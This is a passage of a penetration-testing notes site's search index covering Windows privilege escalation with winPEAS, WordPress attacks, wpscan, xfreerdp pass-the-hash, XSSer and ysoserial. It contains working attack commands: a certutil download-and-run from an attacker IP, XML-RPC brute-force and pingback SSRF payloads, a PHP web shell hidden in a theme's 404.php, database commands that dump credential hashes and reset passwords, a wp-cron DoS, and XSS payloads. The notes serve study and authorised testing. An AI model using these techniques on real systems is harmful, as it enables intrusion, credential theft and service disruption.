                            Download it from https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS.

                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#what-it-does","title":"What it does","text":"
• Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz that I'm copying below.
                            • Provide information about how to exploit misconfigurations.

In the GitHub repo, you will see two files: a .bat and an .exe version.
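
                            A hedged example of a typical transfer-and-run workflow (the file name, port, and attacker IP are placeholder assumptions):

                            # On the attacker machine:\npython3 -m http.server 8000\n\n# On the target (cmd.exe):\ncertutil -urlcache -split -f http://$attacker_ip:8000/winPEASx64.exe winpeas.exe\nwinpeas.exe\n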

                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#checklist-for-local-windows-privilege-escalation","title":"Checklist for Local windows Privilege Escalation","text":"

                            Source: winPEAS README.md file.

                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#system-info","title":"System Info","text":"
                            • Obtain System information
                            • Search for kernel exploits using scripts.
                            • Use Google to search for kernel exploits
                            • Use searchsploit to search for kernel exploits
                            • Interesting info in env vars?
                            • Passwords in PowerShell history?
                            • Interesting info in Internet settings?
                            • Drives
                            • WSUS exploit?
                            • AlwaysInstallElevated?
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#loggingav-enumeration","title":"Logging/AV enumeration","text":"
                            • Check Audit and WEF
                            • Check LAPS
                            • Check if WDigest is active
                            • LSA Protection?
• Credential Guard?
                            • Cached Credentials?
                            • Check if any AV
                            • AppLocker Policy?
                            • UAC
                            • User Privileges
                            • Check current user privilege
                            • Are you member of any privileged group
• Check if you have any of these tokens enabled: SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege?
                            • Users Sessions?
                            • Check users homes (access?)
                            • Check Password Policy
                            • What is inside the Clipboard?
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network","title":"Network","text":"
• Check current network information
                            • Check hidden local services restricted to the outside
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#running-processes","title":"Running Processes","text":"
                            • Processes binaries file and folders permission
                            • Memory Password mining
                            • Insecure GUI apps
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#services","title":"Services","text":"
• Can you modify any service? (see the sketch after this list)
                            • Can you modify the binary that is executed by any service
                            • Can you modify the registry of any service
                            • Can you take advantage of any unquoted service binary path
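
                            A hedged sketch for these service checks using Sysinternals accesschk (assumes the binary has been dropped on the target; the service name and binary path are placeholders):

                            accesschk.exe /accepteula -uwcqv \"Authenticated Users\" *\naccesschk.exe /accepteula -quvw \"C:\\Program Files\\Some Service\\service.exe\"\n\nsc qc <service_name>   # inspect BINARY_PATH_NAME for unquoted paths\n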
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#applications","title":"Applications","text":"
                            • Write permissions on installed applications
                            • Startup Applications
                            • Vulnerable Drivers
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#dll-hijacking","title":"DLL Hijacking","text":"
• Can you write in any folder inside PATH? (see the sketch after this list)
                            • Is there any known service binary that tries to load a non-existent DLL?
                            • Can you write in any binaries folder?
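
                            A quick hedged check for the first item (my addition): list the ACLs of every directory in PATH and look for writable ones:

                            # PowerShell\n$env:Path -split ';' | ForEach-Object { icacls $_ }\n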
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#network_1","title":"Network","text":"
                            • Enumerate the network (shares, interfaces, routes, neighbours, ...)
                            • Take a special look at network services listening on localhost (127.0.0.1)
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#windows-credentials","title":"Windows Credentials","text":"
                            • Winlogon.
                            • Windows Vault.
                            • Interesting DPAPI credentials.
                            • Passwords of saved Wifi networks.
                            • Interesting info in saved RDP Connections.
                            • Passwords in recently run commands.
                            • Remote Desktop Credentials Manager.
                            • AppCmd.exe exists.
                            • SCClient.exe.
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#files-and-registry-credentials","title":"Files and Registry (Credentials)","text":"
                            • Putty: Creds.
                            • SSH keys in registry.
                            • Passwords in unattended files.
                            • Any SAM & SYSTEM.
                            • Cloud credentials.
                            • McAfee SiteList.xml.
                            • Cached GPP Password?
                            • Password in IIS Web config file.
                            • Interesting info in web logs.
                            • Do you want to ask for credentials
                            • Interesting files inside the Recycle Bin.
                            • Other registry containing credentials.
                            • Inside Browser data.
                            • Generic password search.
                            • Tools.
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#leaked-handlers","title":"Leaked Handlers","text":"
• Do you have access to any handle of a process run by an administrator?
                            ","tags":["windows","privilege escalation"]},{"location":"winpeas/#pipe-client-impersonation","title":"Pipe Client Impersonation","text":"","tags":["windows","privilege escalation"]},{"location":"winspy/","title":"winspy - A tool to view windows properties in the system","text":"","tags":["pentesting","windows","thick client"]},{"location":"winspy/#installation","title":"Installation","text":"

                            Download it from https://www.catch22.net/software/winspy

                            ","tags":["pentesting","windows","thick client"]},{"location":"winspy/#what-it-does","title":"What it does","text":"

Basically, WinSpy allows us to select and view the properties of any window in the system. WinSpy is based on the Spy++ utility that ships with Microsoft Visual Studio.

                            It allows us to retrieve passwords from password-edit controls.

Here is a list of all the window properties it retrieves:

                            • Window Class and Name.
                            • Window procedure address.
                            • All window styles and extended styles.
                            • Window properties (set using the SetProp API call).
                            • Complete Child and Sibling window relationships.
                            • Scrollbar positional information.
                            • Full window Class information.
                            • Retrieve passwords from password-edit controls!
                            • Edit window styles!
                            • Alter window captions!
                            • Show / Hide / Enable / Disable / Adjust any window in the system!
                            • Massively improved user-interface!
                            • View the complete system window hierarchy!
                            • Multi-monitor support!
                            • Now works correctly for all versions of Windows.
                            • Tree hierarchy now groups by process.
                            ","tags":["pentesting","windows","thick client"]},{"location":"wireless-security/","title":"Wireless security","text":""},{"location":"wireless-security/#basic-concepts","title":"Basic concepts","text":"Name Explanation MAC address A unique identifier for the device's wireless adapter. SSID The network name, also known as the Service Set Identifier of the WiFi network. Supported data rates A list of the data rates the device can communicate. Supported channels A list of the channels (frequencies) on which the device can communicate. Supported security protocols A list of the security protocols that the device is capable of using, such as WPA2/WPA3.

                            Wired Equivalent Privacy: WEP

                            Wi-Fi Protected Access: WPA

                            "},{"location":"wireless-security/#wep-challenge-response-handshake","title":"WEP Challenge-Response Handshake","text":"Step Who Description 1 Client Sends an association request packet to the WAP, requesting access. 2 WAP Responds with an association response packet to the client, which includes a challenge string. 3 Client Calculates a response to the challenge string and a shared secret key and sends it back to the WAP. 4 WAP Calculates the expected response to the challenge with the same shared secret key and sends an authentication response packet to the client.

Nevertheless, some packets can get lost in transit, so the so-called CRC checksum was integrated. Cyclic Redundancy Check (CRC) is an error-detection mechanism used in the WEP protocol to protect against data corruption in wireless communications.

                            "},{"location":"wireless-security/#encryption-protocols","title":"Encryption Protocols","text":"

                            We can use various encryption algorithms to protect the confidentiality of data transmitted over wireless networks. The most common encryption algorithms in WiFi networks are Wired Equivalent Privacy (WEP), WiFi Protected Access 2 (WPA2), and WiFi Protected Access 3 (WPA3).

                            "},{"location":"wireless-security/#wired-equivalent-privacy-wep","title":"Wired Equivalent Privacy: WEP","text":"

Very weak, with 64-bit and 128-bit encryption keys.

                            WEP uses the RC4 cipher encryption algorithm, which makes it vulnerable to attacks.

Passwords can be cracked in minutes.

                            Superseded by WPA in 2003.
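
                            For context, a hedged sketch of the classic WEP cracking workflow with the aircrack-ng suite (channel, AP MAC, and interface are placeholders; assumes a card already in monitor mode):

                            airodump-ng -c 6 --bssid <AP_MAC> -w wepdump wlan0mon\naireplay-ng -3 -b <AP_MAC> wlan0mon   # replay ARP packets to generate IVs faster\naircrack-ng wepdump-01.cap\n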

                            "},{"location":"wireless-security/#wi-fi-protected-access-wpa","title":"Wi-Fi Protected Access: WPA","text":"

Developed by the Wi-Fi Alliance.

                            Massive security improvement over WEP with 256-bit encryption keys.

                            Superseded by WPA2 in 2006.

                            "},{"location":"wmctrl/","title":"wmctrl","text":"
wmctrl is a command-line tool for interacting with an EWMH/NetWM-compatible X window manager: switching desktops, moving windows between workspaces, and so on.

                            sudo apt-get install wmctrl\n
Example startup script that launches the usual tools and pins each window to its own workspace:

                            #!/bin/bash\n# Jump to workspace 0, launch the tools, then move each window to its workspace\nwmctrl -s 0\nfirefox https://enterprise.hackthebox.com/login &\nobsidian &\ngoogle-chrome &\nriseup-vpn --start-vpn on &\nsleep 5\nwmctrl -r firefox -t 1\nwmctrl -r obsidian -t 2\nwmctrl -r riseup-vpn -t 3\nwmctrl -s 0\n
                            "},{"location":"wordpress-pentesting/","title":"Pentesting wordpress","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#important-wordpress-files-and-directories","title":"Important wordpress files and directories","text":"

                            Login/Authentication

                            • /wp-login.php (This is usually changed to /login.php for security)
                            • /wp-admin/login.php
                            • /wp-admin/wp-login.php
• xmlrpc.php - (Extensible Markup Language - Remote Procedure Call) is a protocol that allows external applications and services to interact with a WordPress site programmatically. It has largely been superseded by the WordPress REST API.

                            Directories

                            • /wp-content - Primary directory used to store plugins and themes.
                            • /wp-content/uploads/ - Directory where uploaded files are stored (Usually prone to directory listing).
                            • /wp-config.php - Contains information required by WordPress to connect to a database. (Contains database credentials)
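
                            A hedged quick-check sketch for probing these paths (my addition; example.com is a placeholder):

                            curl -s -o /dev/null -w \"%{http_code}\" http://example.com/wp-login.php\ncurl -s -o /dev/null -w \"%{http_code}\" http://example.com/xmlrpc.php\n\n# Directory listing enabled on uploads?\ncurl -s http://example.com/wp-content/uploads/ | grep -i \"index of\"\n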
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#dorking-techniques","title":"Dorking techniques","text":"
                            inurl:\"/xmlrpc.php?rsd\" + scoping restrictions\n\nintitle:\"WordPress\" inurl:\"readme.html\" + scoping restrictions = general wordpress detection\n\nallinurl:\"wp-content/plugins/\" + scoping restrictions = general wordpress detection\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-version","title":"Wordpress version","text":"
# Using curl to get the generator meta tag\ncurl -s -X GET https://example.com | grep '<meta name=\"generator\"'\n\n# Using curl to get the version from src files\ncurl -s -X GET <URL> | grep http | grep -E '?ver' | sed -E 's,href=|src=,THIIIIS,g' | awk -F \"THIIIIS\" '{print $2}' | cut -d \"'\" -f2\n

                            Manual techniques

                            • Check WordPress Meta Generator Tag.
                            • Check the WordPress readme.html/license.txt file.
                            • Inspect HTTP response headers for version information (X-Powered-By).
                            • Check the login page for the WordPress version as it is usually displayed.
                            • Check the WordPress REST API and look for the version field in the JSON response (http://example.com/wp-json/)
                            • Analyze JS and CSS files for version information.
                            • Examine the WordPress changelog files with information on version updates. Look for files like changelog.txt or readme.txt in the WordPress directory
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#plugin-enumeration","title":"Plugin enumeration","text":"
                            # curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'wp-content/plugins/*' | cut -d\"'\" -f2\n\n# wpscan\nwpscan --url http://<TARGET> --plugins-detection passive\n# Modes: -mixed (default), -passive or -active\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#themes-enumeration","title":"Themes enumeration","text":"
                            # Using curl\ncurl -s -X GET http://example.com | sed 's/href=/\\n/g' | sed 's/src=/\\n/g' | grep 'themes' | cut -d\"'\" -f2\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#user-enumeration","title":"User enumeration","text":"
                            # Using curl\ncurl -s -I -X GET http://blog.inlanefreight.com/?author=1\n\n# json enumeration\ncurl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq\n\n# wpscan\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -eu\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\nwpscan --url http://46.101.13.204:31822 --plugins-detection passive\n

Manual method: WordPress users have unique numeric identifiers. The first user usually has ID 1, the second ID 2, and so on. So in the browser you can request:

                            http://example.com/wordpressPath?author=1\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#nmap-enumeration","title":"nmap enumeration","text":"
                            # List nmap scripts related to wordpress\nls -la /usr/share/nmap/scripts | grep wordpress\n

                            Results:

                            -rw-r--r-- 1 root root  5061 Nov  1 22:10 http-wordpress-brute.nse\n-rw-r--r-- 1 root root 10866 Nov  1 22:10 http-wordpress-enum.nse\n-rw-r--r-- 1 root root  4641 Nov  1 22:10 http-wordpress-users.nse\n

                            Running one of them:

                            # General enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum <TARGETwithnohttp> \n\n# Plugins enumeration\nsudo nmap -sS -sV --script=http-wordpress-enum --script-args type=\"plugins\" <TARGETwithnohttp> -p 80,443\n\n# User enumeration\nsudo nmap -sS -sV --script=http-wordpress-users <TARGETwithnohttp> \n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#brute-force-attack-on-login","title":"Brute force attack on login","text":"

Usually, the login form is located at example.com/wp-admin/login.php

                            But sometimes the login form is hidden under a different path; there are plugins for doing exactly that.

# Brute force attack with passwords\nwpscan --url HOST/domain --usernames admin,webadmin --password-attack wp-login --passwords filename.txt\n# --usernames: the users you are going to brute force\n# --password-attack: your URI target (different in the case of the WP API)\n# --passwords: path/to/dictionary.txt\n\n\nwpscan --url <targetURLnohttp> -U admin -P /usr/share/wordlists/rockyou.txt\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#enumerating-files-and-folders","title":"Enumerating files and folders","text":"
                            # Using gobuster\ngobuster dir --url https://example.com --wordlist /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -b '404'\n

                            Check out if directory listing is enabled.

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wordpress-xmlrpc-attacks","title":"WordPress xmlrpc attacks","text":"

XML-RPC on WordPress is an API that allows developers of third-party applications and services to interact with a WordPress site programmatically. The XML-RPC API that WordPress provides includes several key functionalities:

                            • Publish a post.
                            • Edit a post.
                            • Delete a post.
                            • Upload a new file (e.g. an image for a post).
                            • Get a list of comments.
                            • Edit comments.

XML-RPC functionality has been turned on by default since WordPress 3.5. Therefore, a normal WordPress installation allows us to perform two types of attacks:

                            • XML-rpc ping attacks.
                            • Brute force attack.

Before attacking, we need to make sure that XML-RPC is enabled on the WordPress installation:

                            1. Ensure you have access to the xmlrpc.php file (usually at https://example.com/xmlrpc.php).

2. Send a POST request:

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 135\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<methodCall> \n<methodName>system.listMethods</methodName> \n<params></params> \n</methodCall>\n

                            Same request with curl would be:

                            curl -X POST -d \"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?> <methodCall> <methodName>system.listMethods</methodName> <params></params></methodCall>\" http://example.com/xmlrpc.php\n

A normal response to this request lists all available methods.

                            The sections below show how to trigger methods such as wp.getUsersBlogs.

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-brute-force-attack","title":"XML-RPC brute force attack","text":"

                            With wpscan:

wpscan --password-attack xmlrpc -t 20 -U admin,david -P passwords.txt --url http://<TARGET>\n

Use Burp Suite Intruder to send this request:

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 235\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall> \n<methodName>wp.getUsersBlogs</methodName> \n<params> \n<param><value>\\{\\{your username\\}\\}</value></param> \n<param><value>\\{\\{your password\\}\\}</value></param> \n</params> \n</methodCall>\n

                            You can also perform a single request, and brute force hundreds of passwords. For that you need to use both system.multicall and wp.getUsersBlogs methods:

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 1560\n\n<?xml version=\"1.0\"?>\n<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\\{\\{ Your Username \\}\\}</string></value><value><string>\\{\\{ Your Password \\}\\}</string></value></data></array></value></data></array></value></member></struct></value>\n\n</data></array></value></param></params></methodCall>\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-uploading-a-file","title":"XML-RPC uploading a file","text":"

With valid credentials you can upload a file; the uploaded file's path will appear in the response (source: HackTricks):

                            <?xml version='1.0' encoding='utf-8'?>\n<methodCall>\n    <methodName>wp.uploadFile</methodName>\n    <params>\n        <param><value><string>1</string></value></param>\n        <param><value><string>username</string></value></param>\n        <param><value><string>password</string></value></param>\n        <param>\n            <value>\n                <struct>\n                    <member>\n                        <name>name</name>\n                        <value><string>filename.jpg</string></value>\n                    </member>\n                    <member>\n                        <name>type</name>\n                        <value><string>mime/type</string></value>\n                    </member>\n                    <member>\n                        <name>bits</name>\n                        <value><base64><![CDATA[---base64-encoded-data---]]></base64></value>\n                    </member>\n                </struct>\n            </value>\n        </param>\n    </params>\n</methodCall>\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-distributed-denial-of-service-ddos-attacks","title":"XML-RPC pingback attack: Distributed denial-of-service (DDoS) attacks","text":"

An attacker executes the pingback.ping method from several affected WordPress installations against a single unprotected target (botnet level).

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-cloudflare-protection-bypass","title":"XML-RPC pingback attack: Cloudflare Protection Bypass","text":"

An attacker executes the pingback.ping method from a single affected WordPress installation, which is protected by Cloudflare, to an attacker-controlled public host (for example, a VPS) in order to reveal the public IP of the target, thereby bypassing any DNS-level protection.

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#xml-rpc-pingback-attack-xspa-cross-site-port-attack","title":"XML-RPC pingback attack: XSPA (Cross Site Port Attack)","text":"

An attacker can execute the pingback.ping method from a single affected WordPress installation to the same host (or another internal/private host) on different ports. An open port or an internal host can be determined by observing the difference in response time and/or by looking at the response of the request.

                            The following is a simple example request, using the Burp Suite Collaborator-provided URL as the callback:

                            POST /xmlrpc.php HTTP/1.1\nHost: example.com\nContent-Length: 303\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n<methodName>pingback.ping</methodName>\n<params>\n<param>\n<value><string>https://pdaskjdasas23fselrkfdsf.oastify.com/1562017983221-4377199190203</string></value>\n</param>\n<param>\n<value><string>https://example.com/</string></value>\n</param>\n</params>\n</methodCall>\n
                            # Brute force with curl\ncurl -X POST -d \"<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>\" http://blog.inlanefreight.com/xmlrpc.php\n\n# If the credentials are not valid, we will receive a 403 faultCode error.\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#rce-attack-on-wordpress","title":"RCE attack on wordpress","text":"

Once you have credentials for the admin user, access the admin panel and introduce a web shell. Where? Appearance > Theme Editor. Choose a theme that is not in use and edit its 404.php to add the shell; this is a quiet way to avoid being noticed.

                            At the end of the file, you can add:

                            system($_GET['cmd']);\n

                            Exploitation:

                            curl -X GET \"http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id\"\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#metasploit-modules","title":"Metasploit modules","text":"
                            use exploit/unix/webapp/wp_admin_shell_upload\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#interesting-files","title":"Interesting files","text":"

If we somehow get our hands on wp-config.php, we will be able to see the database credentials.

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#post-exploitation","title":"Post Exploitation","text":"

                            Extract usernames and passwords:

                            mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;\"\n

                            Change admin password:

                            mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e \"use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;\"\n
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#wp-cronphp-attack","title":"wp-cron.php attack","text":"

                            The WordPress application is vulnerable to a Denial of Service (DoS) attack via the wp-cron.php script. This script is used by WordPress to perform scheduled tasks, such as publishing scheduled posts, checking for updates, and running plugins.

                            An attacker can exploit this vulnerability by sending a large number of requests to the wp-cron.php script, causing it to consume excessive resources and overload the server. This can lead to the application becoming unresponsive or crashing, potentially causing data loss and downtime.

                            Steps to Reproduce:

                            • Get the doser.py script at https://github.com/Quitten/doser.py
                            • Use this command to run the script:
                            python3 doser.py -t 999 -g 'https://\u2588\u2588\u2588\u2588\u2588/wp-cron.php'\n
                            • Go to https://\u2588\u2588\u2588\u2588 after 1000 requests of the doser.py script. The site returns code 502. See the video PoC.

                            To mitigate this vulnerability, it is recommended to disable the default WordPress wp-cron.php script and set up a server-side cron job instead. Here are the steps to disable the default wp-cron.php script and set up a server-side cron job:

                            1. Access your website\u2019s root directory via FTP or cPanel File Manager.
                            2. Locate the wp-config.php file and open it for editing.
                            3. Add the following line of code to the file, just before the line that says \u201cThat\u2019s all, stop editing! Happy publishing.\u201d:
                            define('DISABLE_WP_CRON',\u00a0true);\n
4. Save the changes to the wp-config.php file.
                            5. Set up a server-side cron job to run the wp-cron.php script at the desired interval. This can be done using the server's control panel or by editing the server's crontab file (a hedged example follows).
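
                            A possible crontab entry (my addition; the 15-minute schedule and domain are illustrative):

                            # Run the WordPress scheduler from the system crontab instead of on page loads\n*/15 * * * * wget -q -O - https://example.com/wp-cron.php?doing_wp_cron >/dev/null 2>&1\n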
                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wordpress-pentesting/#tools","title":"Tools","text":"

                            wpscan

                            ","tags":["wordpress","pentesting","CMS"]},{"location":"wpscan/","title":"wpscan - Wordpress Security Scanner","text":"","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#installation","title":"Installation","text":"

Preinstalled in Kali.

                            See the repo: https://github.com/wpscanteam/wpscan.

                            WPScan keeps a local database of metadata that is used to output useful information, such as the latest version of a plugin. The local database can be updated with the following command:

                            wpscan --update\n
                            ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#basic-commands","title":"Basic commands","text":"
# Enumerate users\nwpscan --url https://target.tld/domain --enumerate u\nwpscan --url https://target.tld/ -eu\n\n# Enumerate a range of users 1-100\nwpscan --url https://target.tld/ --enumerate u1-100\nwpscan --url http://46.101.13.204:31822 --plugins-detection passive\n\n# Brute force attack on login page with passwords:\nwpscan --url HOST/domain --usernames admin,webadmin --password-attack wp-login --passwords filename.txt\n# --usernames: the users you are going to brute force\n# --password-attack: your URI target (different in the case of the WP API)\n# --passwords: path/to/dictionary.txt\n\n# Brute force attack on xmlrpc with passwords:\nwpscan --password-attack xmlrpc -t 20 -U username1,username2 -P PATH/TO/passwords.txt --url http://<TARGET>\n\n\n# Enumerate plugins in passive mode\nwpscan --url https://target.tld/ --plugins-detection passive\n# Modes: -mixed (default), -passive or -active\n\n# Common flags\n#   vp (Vulnerable plugins)\n#   ap (All plugins)\n#   p (Popular plugins)\n#   vt (Vulnerable themes)\n#   at (All themes)\n#   t (Popular themes)\n#   tt (Timthumbs)\n#   cb (Config backups)\n#   dbe (Db exports)\n#   u (User IDs range. e.g: u1-5)\n#   m (Media IDs range. e.g m1-15)\n\n# Ignore HTTPS Certificate\n--disable-tls-checks\n
                            ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"wpscan/#examples-from-labs","title":"Examples from labs:","text":"
                            # Raven 1 machine\nwpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n
                            ","tags":["pentesting","web pentesting","enumeration","wordpress"]},{"location":"xfreerdp/","title":"xfreerdp","text":"

xfreerdp is an X11 Remote Desktop Protocol (RDP) client that is part of the FreeRDP project. An RDP server is built into many editions of Windows.

                            ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#installation","title":"Installation","text":"

                            To install xfreerdp, proceed with the following command:

                            sudo apt-get install freerdp2-x11\n
                            ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#basic-commands","title":"Basic commands","text":"
                            # No password indicated. When prompted for one, click Enter and see if it allows us to login\nxfreerdp [/d:domain] /u:<username> /v:$ip\n\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\n# /v:{target_IP} : Specifies the target IP of the host we would like to connect to.\n\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n
                            ","tags":["tools","windows","rdp"]},{"location":"xfreerdp/#troubleshoot-in-pth-attack","title":"Troubleshoot in PtH attack","text":"

                            Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

                            reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

                            Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

                            ","tags":["tools","windows","rdp"]},{"location":"xsltproc/","title":"xsltproc","text":"

                            xsltproc is a command line tool for applying XSLT stylesheets to XML documents.

                            ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#installation","title":"Installation","text":"

Preinstalled in Kali. See the official site: http://xmlsoft.org/xslt/xsltproc.html

                            ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsltproc/#basic-usage","title":"Basic usage","text":"
                            xsltproc target.xml -o target.html\n
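
                            In practice (a hedged example, in line with the nmap tag on this page), the XML input usually comes from an nmap scan:

                            sudo nmap -sC -sV -oX target.xml $ip\nxsltproc target.xml -o target.html\nfirefox target.html &\n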
                            ","tags":["pentesting","tool","reporting","nmap"]},{"location":"xsser/","title":"XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities","text":"

A Cross Site Scripter (XSSer) is an automatic framework to detect, exploit, and report XSS vulnerabilities in web-based applications. It contains several options to try to bypass certain filters and various special techniques of code injection. XSSer has more than 1,300 pre-installed XSS attack vectors and can bypass/exploit code on several browsers/WAFs.

                            ","tags":["pentesting","web pentesting"]},{"location":"xsser/#installation","title":"Installation","text":"
                            sudo apt install xsser\n
                            ","tags":["pentesting","web pentesting"]},{"location":"xsser/#usage","title":"Usage","text":"

Capture a POST request with Burp Suite and fuzz it with XSSer:

                            xsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --auto\n# --url: to introduce the target\n# -p: Payload (it's the body of the POST request captured with Burpsuite). Use the characters 'XSS' to indicate where you want to inject the payloads that xsser is going to fuzz.\n#--auto: Inject a list of vectors provided by XSSer.\n# In the results you will have a confirmation about that parameter being injectable, and an example of payload. Use it for launching the Final Payload (-Fp).\n\nxsser --url \"http://demo.ine.local/index.php?page=dns-lookup.php\" -p \"target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS\" --Fp \"<script>alert(1)</script>\"\n

                            With this, the encoded XSS payload is generated. Now, in Burp Suite, replace the POST parameters with the final attack payload and forward the request.

                            Launch the XSSer interface:

                            xsser --gtk\n
                            ","tags":["pentesting","web pentesting"]},{"location":"ysoserial/","title":"ysoserial - A tool for Java deserialization","text":"","tags":["webpentesting","tools","deserialization","java"]},{"location":"ysoserial/#installation","title":"Installation","text":"

                            Repository: https://github.com/frohoff/ysoserial

                            git clone https://github.com/frohoff/ysoserial.git\n

                            Requires Java 1.7+ and Maven 3.x+

                            sudo apt-get install maven\n

ysoserial has presented some issues with Java 21, so make sure of your version:

                            java --version\n

                            Check your installations:

                            sudo update-alternatives --config java\n

                            Results:

                              Selection    Path                                         Priority   Status\n------------------------------------------------------------\n* 0            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      auto mode\n  1            /usr/lib/jvm/java-17-openjdk-amd64/bin/java   1711      manual mode\n  2            /usr/lib/jvm/java-21-openjdk-amd64/bin/java   2111      manual mode\n

                            Download Java 11:

                            sudo apt-get install openjdk-11-jdk \n

                            Run again

                            sudo update-alternatives --config java\n

Select the new installation, then check the Java version again.

                            Additional debugging: search for \"Java not found in update-alternatives --config java after installing Java on Linux\".

                            After using ysoserial you may reconfigure to use your latest java version.

                            Build the app:

                            mvn clean package -DskipTests\n
